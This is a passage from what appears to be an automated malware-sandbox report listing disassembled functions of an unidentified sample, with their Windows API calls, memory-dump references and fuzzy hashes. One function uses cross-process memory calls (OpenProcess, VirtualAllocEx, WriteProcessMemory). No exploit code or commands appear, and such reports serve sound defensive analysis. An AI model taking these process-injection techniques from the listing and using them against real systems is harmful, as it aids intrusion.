                                                                                                                                        • Instruction Fuzzy Hash: 48014F76602214BFDF225F54EC84B9A7BFDEF48761F148024B901D6210D779DD419BA1
                                                                                                                                        Function 0079B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0079B806
                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0079B810
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079B81F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0079B826
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079B83C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                        • Opcode ID: c14538e5730a56a86b195bae48bb9ed639c4ec4afd4e9760c8eab24bbfba3280
                                                                                                                                        • Instruction ID: 7fec8ce8bbab22dce50704394a0dd698a66b783ac6b58ca31e70559409d38b9b
                                                                                                                                        • Opcode Fuzzy Hash: c14538e5730a56a86b195bae48bb9ed639c4ec4afd4e9760c8eab24bbfba3280
                                                                                                                                        • Instruction Fuzzy Hash: 2AF03775202248AFEB211FA5FCC8E6B3B6DFF4E754F008429F941CA150CB699D418AA0
                                                                                                                                        Function 0079B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0079B7A5
                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0079B7AF
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0079B7BE
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0079B7C5
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079B7DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                        • Opcode ID: c25f133bc1537ef5b922e096bc9c3e22660d824ed8b8f234e7b0a7c3b1c891f8
                                                                                                                                        • Instruction ID: 7504f41ddb94e1dacb0bb553a006bd0748136bf5147461ef80fe0ab543b1db7a
                                                                                                                                        • Opcode Fuzzy Hash: c25f133bc1537ef5b922e096bc9c3e22660d824ed8b8f234e7b0a7c3b1c891f8
                                                                                                                                        • Instruction Fuzzy Hash: 3FF04F71241248AFEB201FE5BCC9E773BACFF8A755F10811AF941CB160DB799C418A60
                                                                                                                                        Function 0079FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079FA8F
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0079FAA6
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 0079FABE
                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 0079FADA
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 0079FAF4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                        • Opcode ID: e803a941922b2f8790cfaba5a6392cc54560d497c8297c698e78e4694d97c538
                                                                                                                                        • Instruction ID: 46fe72e60d0f8719d44572368e21507f79ce9a4f4bda3f24dee4ed667e55e634
                                                                                                                                        • Opcode Fuzzy Hash: e803a941922b2f8790cfaba5a6392cc54560d497c8297c698e78e4694d97c538
                                                                                                                                        • Instruction Fuzzy Hash: 25016D30500744ABEF349B20ED8EB9677B8FB05B49F04816AE587A91E0DBF9AD548A44
                                                                                                                                        Function 0077B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EndPath.GDI32(?), ref: 0077B526
                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,007DF583,00000000,?), ref: 0077B542
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B555
                                                                                                                                        • DeleteObject.GDI32 ref: 0077B568
                                                                                                                                        • StrokePath.GDI32(?), ref: 0077B583
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                        • Opcode ID: 003b5c4587a9348ca0c73322579d8baa85763703cd69f2246afcd34657bb5d8f
                                                                                                                                        • Instruction ID: 91d03a9c1d56423f82c94194f84bb0776d49e39ff6b4b4d489bd545bee45bca7
                                                                                                                                        • Opcode Fuzzy Hash: 003b5c4587a9348ca0c73322579d8baa85763703cd69f2246afcd34657bb5d8f
                                                                                                                                        • Instruction Fuzzy Hash: A4F0C430001248ABDF399F25ED8C7643FE5BB25362F28C224E9A9481F0C73989A6DF14
                                                                                                                                        Function 007AFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007AFAB2
                                                                                                                                        • CoCreateInstance.COMBASE(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AFACA
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • CoUninitialize.COMBASE ref: 007AFD2D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                                        • Opcode ID: e470fd4223dab869ef1657501f112b4c463d779a0414b1c85e94c1be6c1aa0f1
                                                                                                                                        • Instruction ID: 4066b0fbd622064505f4f36c0e40fa69cd110438b18c25115909876c09440672
                                                                                                                                        • Opcode Fuzzy Hash: e470fd4223dab869ef1657501f112b4c463d779a0414b1c85e94c1be6c1aa0f1
                                                                                                                                        • Instruction Fuzzy Hash: E0A14D71504205AFC700EF94CC95EABB7EDEF88704F408A1CF5569B192EB74EA09CB92
                                                                                                                                        Function 0077DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #$+
                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                        • Opcode ID: e06d1ee98ead8bb5a3455d79ec923720728c979f87ae19ef8abe2d2bf1fa713d
                                                                                                                                        • Instruction ID: 854b009d4dd8bd6c4d27506b11b89994f2500d4a3b6e28563cc86449f59bcad8
                                                                                                                                        • Opcode Fuzzy Hash: e06d1ee98ead8bb5a3455d79ec923720728c979f87ae19ef8abe2d2bf1fa713d
                                                                                                                                        • Instruction Fuzzy Hash: A851E2B5504246DFDF25DF68C4856F97BB4BF1A310F148056F851AB3A0D738AC46C764
                                                                                                                                        Function 007A503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007FDC40,?,0000000F,0000000C,00000016,007FDC40,?), ref: 007A507B
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 0076B8A7: _memmove.LIBCMT ref: 0076B8FB
                                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007A50FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                                        • Opcode ID: 6bd042b00f6af7a6c2324b16d5c199724e635535d25ad23a53bf0b65c35340bc
                                                                                                                                        • Instruction ID: 1c304580e81561a222f6c9c949ff8adb7292c9e545aa13ebf659ac75d85ca8e0
                                                                                                                                        • Opcode Fuzzy Hash: 6bd042b00f6af7a6c2324b16d5c199724e635535d25ad23a53bf0b65c35340bc
                                                                                                                                        • Instruction Fuzzy Hash: F541B274A00609DFCF10DF58C885ABEB7B5BF89304F048269E916AB392DB389D41CB51
                                                                                                                                        Function 0079CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079C9FE,?,?,00000034,00000800,?,00000034), ref: 007A4D6B
                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0079CFC9
                                                                                                                                          • Part of subcall function 007A4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 007A4D36
                                                                                                                                          • Part of subcall function 007A4C65: GetWindowThreadProcessId.USER32(?,?), ref: 007A4C90
                                                                                                                                          • Part of subcall function 007A4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0079C9C2,00000034,?,?,00001004,00000000,00000000), ref: 007A4CA0
                                                                                                                                          • Part of subcall function 007A4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0079C9C2,00000034,?,?,00001004,00000000,00000000), ref: 007A4CB6
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079D036
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079D083
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                        • Opcode ID: 2cce3cc4943c63aa7dba4267d7f06e2503643d393d27d53d50928f7b08ad8ef4
                                                                                                                                        • Instruction ID: b0ed59f41b0026c36f1869002e49ad0f81c14e933d8c7729d09eb62d276e1f7a
                                                                                                                                        • Opcode Fuzzy Hash: 2cce3cc4943c63aa7dba4267d7f06e2503643d393d27d53d50928f7b08ad8ef4
                                                                                                                                        • Instruction Fuzzy Hash: 09416E72A00218BFDB10DFA4CC85FDEB778EF89700F008195EA55BB181DA756E45CB61
                                                                                                                                        Function 007CA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FDBF0,00000000,?,?,?,?), ref: 007CA4E6
                                                                                                                                        • GetWindowLongW.USER32 ref: 007CA503
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007CA513
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long
                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                        • Opcode ID: 9c3963dfa0aed76ea288bde0d6640a454ae4d40131fdf9dc37d9845c7120ddd3
                                                                                                                                        • Instruction ID: 2ae24095be0725a4343249ee8619b04dd0f9d9c1a7a536bb8572621eeabdeceb
                                                                                                                                        • Opcode Fuzzy Hash: 9c3963dfa0aed76ea288bde0d6640a454ae4d40131fdf9dc37d9845c7120ddd3
                                                                                                                                        • Instruction Fuzzy Hash: 1C31C231100249BBDF258E78DC45FEA7769FB49329F208728F975D21E0C738E9609B50
                                                                                                                                        Function 007B57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007B57E7
                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007B581D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                        • String ID: ?K{$|
                                                                                                                                        • API String ID: 1413715105-1505320054
                                                                                                                                        • Opcode ID: ed914d38edb320a6948319a1a58037fbb2b39b36af84d2bfc63783dd5e205ca9
                                                                                                                                        • Instruction ID: 043313307e625c8cd06a3d79b08989a2454a8c4f65bc69227caaa49eaf954d5c
                                                                                                                                        • Opcode Fuzzy Hash: ed914d38edb320a6948319a1a58037fbb2b39b36af84d2bfc63783dd5e205ca9
                                                                                                                                        • Instruction Fuzzy Hash: 70311B71800119EBCF11AFA0DC99EEE7FB9FF18310F104119F816A6162DB359A46DB60
                                                                                                                                        Function 007CA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007CA74F
                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007CA75D
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007CA764
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                        • Opcode ID: ea8ccb24fa409202fe5864ddbde7119f4b590ea9a4277bfdea882a567d2731ef
                                                                                                                                        • Instruction ID: 155be36ca659b28cad5776f9026f46fd1e5efc3b4da530ffee0d7f6e4b6bab6a
                                                                                                                                        • Opcode Fuzzy Hash: ea8ccb24fa409202fe5864ddbde7119f4b590ea9a4277bfdea882a567d2731ef
                                                                                                                                        • Instruction Fuzzy Hash: 0F217AB5600209BFDB10DF68CCC5EA737ADFB5A398B14445DFA019B251CB74EC128BA1
                                                                                                                                        Function 007C97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C983D
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C984D
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C9872
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                        • String ID: Listbox
                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                        • Opcode ID: 098a3fefcbf4b7fff596e26bcae4957655150ca8549ab5c78892966108b54a32
                                                                                                                                        • Instruction ID: 68b4521533ceeedb9589a6188910c4262962c1d7212400fe808c3cff4355ea66
                                                                                                                                        • Opcode Fuzzy Hash: 098a3fefcbf4b7fff596e26bcae4957655150ca8549ab5c78892966108b54a32
                                                                                                                                        • Instruction Fuzzy Hash: BB21A732611158BFEF218F54CC89FAB3BAAEF89754F11812CFA159B190C679DC5187A0
                                                                                                                                        Function 007CA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007CA27B
